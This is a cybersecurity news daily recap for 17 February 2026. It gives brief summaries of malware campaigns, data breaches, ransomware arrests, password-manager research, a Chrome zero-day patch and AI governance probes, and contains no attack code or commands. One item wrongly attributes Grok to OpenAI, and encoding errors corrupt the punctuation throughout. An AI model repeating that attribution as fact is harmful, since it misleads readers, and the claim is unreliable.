![Cybersecurity News | Daily Recap [17 Feb 2026]](https://www.hendryadrian.com/tweet/image/DailyRecap.png "Cybersecurity News | Daily Recap [17 Feb 2026]")
Daily Recap, the bulletin highlights Keenadu Android backdoor embedded in firmware and Google Play apps, a Lazarus-linked graphalgo campaign delivering a RAT, and APT28ās MacroMaze operation targeting Western and Central European governments. It also notes Eurail data breaches, Figureās data exposure after an employee phishing attack, and governance probes like Grok, along with key vulnerabilities such as CVE-2026-2441 and patch guidance for Chrome, as well as passkeys and ISO 27001 considerations. #Keenadu #graphalgo #Lazarus #MacroMaze #Eurail #Figure #Grok #ShinyHunters #CVE20262441 #Phobos #LAPSUS$ #OperationAether #X
Malware & APTs
- Researchers discovered a sophisticated Keenadu Android backdoor embedded in firmware, system apps and Google Play apps that can compromise every installed app and has infected about 13,000 devices worldwide ā Keenadu backdoor
- ReversingLabs attributes a modular fake-recruiter campaign called graphalgo to the Lazarus APT, using malicious npm/PyPI packages to deliver a RAT that targets crypto wallets and developer environments ā Graphalgo campaign
- APT28ās āOperation MacroMazeā used malicious macros, VBScript and headless Edge to target Western/Central European governments, exfiltrating documents via webhook techniques while avoiding persistence ā MacroMaze operation
- An infostealer (likely a Vidar variant) was seen exfiltrating OpenClaw agent secrets, API keys and tokensāmarking the first inātheāwild targeting of AI agent frameworksāand researchers also disclosed a patched CVE-2026-2577 in Nanobot ā OpenClaw theft
Data Breaches & Extortion
- Records from a Eurail January breachāincluding passport numbers, ID numbers, IBANs and health dataāare now being sold on criminal marketplaces and a sample was posted to Telegram, prompting GDPR notifications and customer mitigation guidance ā Eurail breach, Eurail breach
- South Koreaās PIPC fined Dior, Louis Vuitton and Tiffany a combined 36 billion won after a SaaS intrusion tied to the Scattered LAPSUS$ Hunters exposed millions of customer records via social engineering and device malware ā Luxury fines
- Fintech firm Figure disclosed a breach following an employee phishing attack by ShinyHunters, with roughly 2.5GB of files released and affected customers offered credit monitoring ā Figure breach
- Japanās Washington Hotel reported a ransomware infection that breached servers on Feb 13, 2026, causing limited operational impacts and ongoing investigation with no extortion demands observed so far ā Hotel ransomware
- Dutch police arrested a man who downloaded confidential police documents mistakenly shared by an officer and then demanded payment to delete them, seizing storage devices and citing potential computer trespass charges ā Reward arrest
Ransomware & Law Enforcement
- Polish authorities arrested a 47āyearāold suspect tied to Phobos ransomware as part of Europolās Operation Aether, seizing computers and disrupting infrastructure while warning companies of imminent threats ā Phobos arrest
Authentication & Password Security
- ETH Zurich researchers showed cloud password managers can be compromised under a maliciousāserver modelādemonstrating full vault compromise for Bitwarden and LastPass and sharedāvault attacks on Dashlaneāprompting vendor patches and debate over severity ā Vault compromise
- A guide outlines how organizations can adopt passkeys (FIDO2/WebAuthn) while remaining ISO/IEC 27001 compliant by mapping deployments to Annex A controls, documenting recovery, and monitoring new attack vectors ā Passkeys guide
Vulnerabilities & Patches
- Google released an outāofāband patch for an actively exploited useāafterāfree flaw in Chromeās CSS engine (CVE-2026-2441) and urged immediate updates to Stable 145.0.7632.75/76 or specified 144.x releases to mitigate remote code execution risk ā Chrome patch
Policy, AI & Governance
- Irelandās Data Protection Commission opened a formal GDPR inquiry into X over OpenAIās Grok allegedly generating nonāconsensual sexual images of real people, joining probes by the ICO, EC, California AG, Ofcom and French prosecutors ā Grok probe
- The India AI Impact Summit 2026 emphasized Global South inclusion in AI governance and prioritized employability, digital sovereignty, openāsource operationalisation and Global Impact Challenges for policy-to-implementation pipelines ā India AI Summit
- Researchers observed sustained surges of automated website traffic traced to servers linked to China and Tencent, often geolocated to Lanzhou, suggesting largeāscale scrapingāpossibly for AI trainingādespite nearāzero engagement metrics ā Chinese bots
- During the DHS shutdown, CISA will operate at reduced capacity with ~888 of 2,341 staff excepted, keeping the KEV Catalog online but delaying regulatory work like CIRCIA finalization and enforcement of FCEB compliance ā CISA slowdown
- The DSS filed three criminal charges against former Kaduna governor Nasir El-Rufai alleging unlawful interception of the NSAās communications under the Cybercrimes (Amendment) Act 2024 and the Nigerian Communications Act, fueling protests and political backlash ā El-Rufai charges